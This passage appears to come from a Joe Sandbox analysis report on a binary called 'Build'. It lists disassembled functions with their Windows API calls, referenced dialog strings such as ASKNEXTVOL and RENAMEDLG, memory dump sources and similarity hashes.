Instruction ID: b4396bb6628ad7f331dd494cc52fa8dfcd2e628e5c563df1f3e180414223457d
Opcode Fuzzy Hash: e6242152112e82acb325bd1ac8fb151f50c5e317f30ce141094d73b0a45032fd
Instruction Fuzzy Hash: 05412871900609EFCF15DF98CC81EAEBBB9FF48314F5A8459F904A7212D735A960DB50

Function 0092F7B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0092F82D
_strncpy.LIBCMT ref: 0092F871

Part of subcall function 00933F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0092F801,00000000,00000000,?,00965070,?,0092F801,?,?,00000050,?), ref: 00933F64

Strings

$%s, xrefs: 0092F822
@%s, xrefs: 0092F817

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 37b3b55b4a6d1dbe1998de4de60695c39f7764a634407b3109558f96f261bc10
Instruction ID: 5e301e35f595da0688d1f058acb244609a290c8d00fce203d9d955c8b2d2f63c
Opcode Fuzzy Hash: 37b3b55b4a6d1dbe1998de4de60695c39f7764a634407b3109558f96f261bc10
Instruction Fuzzy Hash: 01218C729003589BEB20DFA4DC11FAEB7BCBB45700F44053AFA2293191E771E9088B50

Function 0093CDA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0

EndDialog.USER32(?,00000001), ref: 0093CE28
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0093CE3D
SetDlgItemTextW.USER32(?,00000066,?), ref: 0093CE52

Strings

ASKNEXTVOL, xrefs: 0093CDB8

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 79cae521865577a80c61a428d9bd8e2c6216cf73fdd30ecb0e585743f6b76222
Instruction ID: aa9043ca76c069098106ceee4bff061549bfed3f5b8cf307a8fb876900f67117
Opcode Fuzzy Hash: 79cae521865577a80c61a428d9bd8e2c6216cf73fdd30ecb0e585743f6b76222
Instruction Fuzzy Hash: D611E973248A14BFD2219F68DC09F677B6DFB4AB40F000410F651BB2A4C761AD05AF65

Function 00932F22 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0092CAA0,00000008,00000004,0092F1F0,?,00000000), ref: 00932F61
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0092CAA0,00000008,00000004,0092F1F0,?,00000000), ref: 00932F6B
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0092CAA0,00000008,00000004,0092F1F0,?,00000000), ref: 00932F7B

Strings

Thread pool initialization failed., xrefs: 00932F93

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 9ac9b46e9e98b96b46b893e9307c7ea8dd7c5d4604171e459db3a1c2ccafec61
Instruction ID: 7ae80b22cf4e641de4aa0463934a634a706cb4fef090166ba9f00425d1b29367
Opcode Fuzzy Hash: 9ac9b46e9e98b96b46b893e9307c7ea8dd7c5d4604171e459db3a1c2ccafec61
Instruction Fuzzy Hash: 91115EB1608709AFD3215F7B9C84AA7FBECEB95755F60482EF1DAC3240D6B159408BA0

Function 009400EF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0094012E, 00940162
RENAMEDLG, xrefs: 00940143

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 910be284a76f54d14a4151e8f23766668df2b9490a6e05ebd74d9a0cae225fa7
Instruction ID: 0b555949b24ee522e8d3285a66cf25ce19f3e5dac25d76c33e7e8aa6ee4559fa
Opcode Fuzzy Hash: 910be284a76f54d14a4151e8f23766668df2b9490a6e05ebd74d9a0cae225fa7
Instruction Fuzzy Hash: C701BC7261C244AFDB118F65EC44F767BA8EB89784F100429FA49A3270C6B18850EBA0

Function 00924B3D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00924B42

Part of subcall function 0094106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00941079
Part of subcall function 0094106D: ___delayLoadHelper2@8.DELAYIMP ref: 0094109F

std::_Xinvalid_argument.LIBCPMT ref: 00924B4D

Strings

string too long, xrefs: 00924B3D
vector too long, xrefs: 00924B48

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
String ID: string too long$vector too long
API String ID: 2355824318-1617939282
Opcode ID: 39bed973e6a8cf9f7ba9e9c1afe418127617c4976fdae5642051fc540bce44ad
Instruction ID: 1834df14371186d634d608c72e9cded97b06775ea9bc15290cdeedecb359f2e2
Opcode Fuzzy Hash: 39bed973e6a8cf9f7ba9e9c1afe418127617c4976fdae5642051fc540bce44ad
Instruction Fuzzy Hash: 6AF0A031200364AB8A34AF69EC45D4EB3EDEFC4B21710091AF985C3605C3B0E9448BB1

Function 0094C06A Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0094C0F5
__alldvrm.LIBCMT ref: 0094C2F6
__alldvrm.LIBCMT ref: 0094C318

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction ID: 9828f10488b956a4dd063a9d348d4af3f452538b3cc3eac53cf7c4f2d7f19780
Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction Fuzzy Hash: 89A1ADB2A063869FDB65CF58C891FBEBBE8EF56340F18416DE495AB242C278CD41C750

Function 0092C142 Relevance: 6.1, APIs: 4, Instructions: 135filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00929343,?,?,?), ref: 0092C1EE
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00929343,?,?), ref: 0092C22C
SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00929343,?,?,?,?,?,?,?,?), ref: 0092C2AF
CloseHandle.KERNEL32(00000800,?,?,?,00929343,?,?,?,?,?,?,?,?,?,?), ref: 0092C2B6

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 7c3c555660ded6e13cb5818f0f7ca0299851acd2604d8df2dd035d7baa5d31a8
Instruction ID: a11db8c49a9ff649e1149592b66a926eeee61195cadf6a1028fd966eea2619dd
Opcode Fuzzy Hash: 7c3c555660ded6e13cb5818f0f7ca0299851acd2604d8df2dd035d7baa5d31a8
Instruction Fuzzy Hash: 1141D2B024C3919EE320DF64EC46FAFB7E8AF89700F04091DB5D1971C6DA64EA48C752

Function 009210E0 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00921136
_wcslen.LIBCMT ref: 0092115A
_wcslen.LIBCMT ref: 00921187
_wcslen.LIBCMT ref: 009211AC

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: cd8db2cf0f87ce679b39e6d7820eb1a2f9c3ca3b07dbcc6a5681a9722fdd18f5
Instruction ID: 63ad9cc9a8badd9b401ab7c3e4ea9451edbff3b897f459bf14d1a7a7f3a82ae8
Opcode Fuzzy Hash: cd8db2cf0f87ce679b39e6d7820eb1a2f9c3ca3b07dbcc6a5681a9722fdd18f5
Instruction Fuzzy Hash: 6841B4716087519BC725DF38C945A9FBBE8FF85300F10092EF999D3251DB30E9098B96

Function 0092BD61 Relevance: 6.1, APIs: 4, Instructions: 126COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0092BD93
_wcslen.LIBCMT ref: 0092BDB6
_wcslen.LIBCMT ref: 0092BE4C
_wcslen.LIBCMT ref: 0092BEB1

Part of subcall function 0092C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0092C3A5

Part of subcall function 0092BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 0092BC1C
Part of subcall function 0092BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 0092BC48

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen$DirectoryRemove$CloseFind
String ID:
API String ID: 973666142-0
Opcode ID: 6cc0f00f9e9221bf9c6f7b4f12cf7e72f7cbf744fa6d3b56e7d90344279d3032
Instruction ID: a590d5018c36620bf0cbdfc40078a81278857c4685fc873353c36f5c6a85dca3
Opcode Fuzzy Hash: 6cc0f00f9e9221bf9c6f7b4f12cf7e72f7cbf744fa6d3b56e7d90344279d3032
Instruction Fuzzy Hash: 6D41B4725043A096CB30EB64A845AEBB3ED9FC5300F45481EEA8993149EB749D88C7E2

Function 0094EFD8 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,62E85006,00946F64,00000000,00000000,00947F99,?,00947F99,?,00000001,00946F64,62E85006,00000001,00947F99,00947F99), ref: 0094F025
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0094F0AE
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0094F0C0
__freea.LIBCMT ref: 0094F0C9

Part of subcall function 0094BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 68fa20883b93ed49445ee12d0c154b7cd9b375bf851bff02b703bbfc29fddddf
Instruction ID: 8247f154b2070423764153648e38a2ab478da61581c5f44e5d5e78ee5b1ac257
Opcode Fuzzy Hash: 68fa20883b93ed49445ee12d0c154b7cd9b375bf851bff02b703bbfc29fddddf
Instruction Fuzzy Hash: 5D31E132A1020AABDF24DF65DC51EAE7BA9EB80310F044229FC04D7192EB35DD94CB90

Function 0093C5F3 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0093C5F6
GetDeviceCaps.GDI32(00000000,00000058), ref: 0093C605
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0093C613
ReleaseDC.USER32(00000000,00000000), ref: 0093C621

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: a9462aeb3f9e18d10000a5985b62a4211930c9a571d3c9e7469a2ee41754988c
Instruction ID: e1492f3ba2c0fdff853c409a4f2f8f0482b2cb658797342494dabd0c51e30259
Opcode Fuzzy Hash: a9462aeb3f9e18d10000a5985b62a4211930c9a571d3c9e7469a2ee41754988c
Instruction Fuzzy Hash: 3FE0EC719ADB60A7D3215FA0AC1DFA67B64EB19713F240005F601A63E0CAB094009FD0

Function 0093C79C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

Part of subcall function 0093C629: GetDC.USER32(00000000), ref: 0093C62D
Part of subcall function 0093C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093C638
Part of subcall function 0093C629: ReleaseDC.USER32(00000000,00000000), ref: 0093C643

GetObjectW.GDI32(?,00000018,?), ref: 0093C7E0

Part of subcall function 0093CA67: GetDC.USER32(00000000), ref: 0093CA70
Part of subcall function 0093CA67: GetObjectW.GDI32(?,00000018,?), ref: 0093CA9F
Part of subcall function 0093CA67: ReleaseDC.USER32(00000000,?), ref: 0093CB37

Strings

(, xrefs: 0093C935

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: e3682a134befe72b664a8889182a1465877333abd34bd9d13d4eecc7d1fc9ec6
Instruction ID: eceda6dd3c0a72648a067c89fe3d89a7bc47ff24cbb69f143db92d12e56639ec
Opcode Fuzzy Hash: e3682a134befe72b664a8889182a1465877333abd34bd9d13d4eecc7d1fc9ec6
Instruction Fuzzy Hash: 8091E3B1618754AFD610DF25C844A2BBBE8FFC9B05F10491EF49AE7260CB70A905DF62

Function 0093D76E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0093D7D1
_wcslen.LIBCMT ref: 0093D7EC

Strings

}, xrefs: 0093D7C4

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 0970b4314c5ddc48bbf76d2d0dedb3ce4066275d06561eb0d7f185a9c1d0a281
Instruction ID: 4b54c8d191a9606f872378b03df39bf3d3c09028fefab2fdc7c2eb5b5237afc5
Opcode Fuzzy Hash: 0970b4314c5ddc48bbf76d2d0dedb3ce4066275d06561eb0d7f185a9c1d0a281
Instruction Fuzzy Hash: 58219D72A0A7455AD731EB64E855F6BB3ECEFC5710F40042AF584C3241EA60E9488BE2

Function 0092D8AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0092D8D3

Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13

Strings

%c:\, xrefs: 0092D8C9

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: e55769dd1f61780e3f78e27caf96f4e79debd2f7cb65e4c0b7b99ca4da3588cc
Instruction ID: b7691ec65523023f7a676f87ad333e0518becc669d7ab5c8354c6b36a8ca5cfe
Opcode Fuzzy Hash: e55769dd1f61780e3f78e27caf96f4e79debd2f7cb65e4c0b7b99ca4da3588cc
Instruction Fuzzy Hash: D70124675073217ADB30AB79BC46E6BA7ACEED6370740441AF484C2186EA20D890C7B1

Function 00921366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00930244: _swprintf.LIBCMT ref: 00930284
Part of subcall function 00930244: _strlen.LIBCMT ref: 009302A5
Part of subcall function 00930244: SetDlgItemTextW.USER32(?,00962274,?), ref: 009302FE
Part of subcall function 00930244: GetWindowRect.USER32(?,?), ref: 00930334
Part of subcall function 00930244: GetClientRect.USER32(?,?), ref: 00930340

GetDlgItem.USER32(00000000,00003021), ref: 009213AA
SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0

Strings

0, xrefs: 00921369

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 0dab8056c3be664f72b7d1e97122456166e72beffe0dc3a524859dfab38a8e76
Instruction ID: d8b40cfbcfa80d3ce68cd7fba22bfedf73d99ff2ecb477a6dc71c528e3a06df0
Opcode Fuzzy Hash: 0dab8056c3be664f72b7d1e97122456166e72beffe0dc3a524859dfab38a8e76
Instruction Fuzzy Hash: 2AF0C23114835CAADF15BF62AC1DBEA3BAEAF60314F048114FC4951DA5DBB5C9A0EF50

Function 009330CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,009331E7,?,?,0093325F,?,?,?,?,?,00933249), ref: 009330D0
GetLastError.KERNEL32(?,?,0093325F,?,?,?,?,?,00933249), ref: 009330DC

Part of subcall function 00927BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00927BD5

